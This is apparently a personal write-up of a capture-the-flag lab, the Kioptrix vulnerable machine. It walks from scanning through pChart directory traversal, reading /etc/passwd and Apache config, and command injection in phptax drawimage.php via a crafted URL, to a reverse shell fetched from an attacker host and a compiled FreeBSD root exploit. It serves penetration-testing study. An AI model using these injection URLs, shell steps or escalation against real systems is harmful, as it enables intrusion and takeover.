Kioptrix Report:
  1. First of all we would like to find the system in the LAN.
    (nmap/arp/wireshark) = 172.16.0.23
  2. Try to find a vulnerabilities:
  • Nikto Scanning: nikto –h 172.16.0.23
    Server: Apache 2.2.21 (FreeBSD) learn about other features: PHP version, Open SSL, HTTP Methods,Port 80, etc…

* Look after code mistakes on header tags (View Source)
  • In this case the developer didn’t delete the META Code:
    pChart2.1.3/index.php
    to check this path, past it in the url after the ip.
  • Surprise! We have an access to the web application service :)

We would like to check the site and look after new vulnerability with Tamper Data/Suite-Burp.

With tamper data we can see information about the session, copy the files and check our permission and injection points.

In our example the injection is after the send = instead of the file.

Now we have kind of half shell try to navigate to /etc/passwd file and see the user information.

As we saw in the beginning the operation system is based on FreeBSD and Apache 2.2 is the server.
Try to find the apache configuration file.
http://172.16.0.23/pChart2.1.3/examples/index.php?Action=View&Script=/usr/local/etc/apache22/httpd.conf

I find also also a file /etc/rc.conf who gave me information about the services
and I find there is a enable and the firewall rules

Open the httpd.conf
The server is listening in port 80 and 8080

Scroll down you can find information about browser compatibility view and path with root permission  
Try to open the page with port 8080 and user agent of Mozilla 4.0

Open the file and look after a new injection point

Open Tamper-data, find where the files will be save to:
http://172.16.0.23:8080/phptax/drawimage.php?pfilez=1040d1-pg1.tob

The injection is after the .tob the executive will take the files and convert them to pdf.
$pfilef=str_replace(".tob",".png",$_GET[pfilez]);
$pfilep=str_replace(".tob",".pdf",$_GET[pfilez]);
Header("Content-type: image/png");
if ($_GET[pdf] == "") Imagepng($image);
if ($_GET[pdf] == "make") Imagepng($image,"./data/pdf/$pfilef");
if ($_GET[pdf] == "make") exec("convert ./data/pdf/$pfilef ./data/pdf/$pfilep");

Try to write any command in the url and redirect to a file:
http://172.16.0.23:8080/phptax/index.php?pfilez=1040ab-pg1.tob;whoami%3Etest.txt&pdf=make

Visit in the file:

Now after we can write to files I would like to do a fetch and transfer the reverse shell file to kioptrix
  1. Open the rs.php and update the ip, port & shell
  2. Host: python –m SimpleHTTPServer 8000
  3. Run the file! (From the Url)
  4. Host: sudo nc –l 8000 –v

  5. I would like to escalate the situation and find in Google a FreeBSD privilege escalation script. Save the script in esc.c
  6. Host: python –m SimpleHTTPServer 8000


  1. gcc esc.c –o xfile
  2. file xfile
  3. Run the file: ./xfile
  4. We have root permission!! :)


Share To:

Fabio Lior Rahamim